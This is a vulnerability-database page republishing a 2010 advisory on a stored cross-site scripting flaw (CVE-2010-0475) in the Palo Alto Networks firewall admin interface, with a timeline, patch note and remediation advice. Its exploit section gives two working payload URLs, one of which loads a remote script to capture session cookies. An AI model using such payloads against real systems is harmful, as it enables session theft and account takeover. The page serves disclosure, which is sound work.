Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Palo Alto Network Cross Site Scripting

🗓️ 14 May 2010 00:00:00Reported by Jeromie JacksonType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 44 Views

Palo Alto Network Cross-Site Scripting (XSS) vulnerability found. Malicious data injection and redirect possible

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2010-0475
19 May 201000:00
circl
CVE		CVE-2010-0475
14 May 201019:24
cve
Cvelist		CVE-2010-0475
14 May 201019:24
cvelist
Exploit DB		Palo Alto Network Vulnerability - Cross-Site Scripting
19 May 201000:00
exploitdb
EUVD		EUVD-2010-0506
7 Oct 202500:30
euvd
exploitpack		Palo Alto Network Vulnerability - Cross-Site Scripting
19 May 201000:00
exploitpack
NVD		CVE-2010-0475
14 May 201019:30
nvd
Prion		Cross site scripting
14 May 201019:30
prion
securityvulns		Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)
13 May 201000:00
securityvulns
seebug.org		Palo Alto Networks防火墙esp/editUser.esp页面存储式跨站脚本漏洞
18 May 201000:00
seebug
Rows per page
`Class: Cross-Site Scripting (XSS) Vulnerability  
CVE: CVE-2010-0475  
Remote: Yes   
Local: Yes   
Published: May 11, 2010 08:30AM  
Timeline:Submission to MITRE: 1/18/2010  
Vendor Contact: 2/18/2010  
Vendor Response: 2/18/2010  
Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9)  
Credit: Jeromie Jackson CISSP, CISM  
COBIT & ITIL Certified  
President- San Diego Open Web Application Security Project (OWASP)  
Vice President- San Diego Information Audit & Control Association (ISACA)  
SANS Mentor  
LinkedIn: www.linkedin.com/in/securityassessment  
Blog: www.JeromieJackson.com  
Twitter: www.twitter.com/Security_Sifu  
  
Validated Vulnerable:   
Latest Version Per December 31, 2009  
  
Discussion:   
  
A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface. By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or other nefarious activity.   
  
  
Exploit:   
Single Line working- https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT>  
  
&admin-role=%5Bobject+Object%5D&bSubmit=O  
  
  
  
WORKING FOR REDIRECT TO LOAD cookies into URL.  
  
https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT/XSS SRC="http://www.jeromiejackson.com/tryme.js"></SCRIPT>&admin-role=%5Bobject+Object%5D&bSubmit=O  
  
  
Solution:   
A patch will be required from the vendor. It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application.   
  
References:  
OWASP Cross-Site Scripting (XSS) Attack Discussion  
Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 May 2010 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.00198
cross-site scriptingvulnerabilitypalo alto networkinjectionmaliciouspatchuser inputvendorowasprsnake
44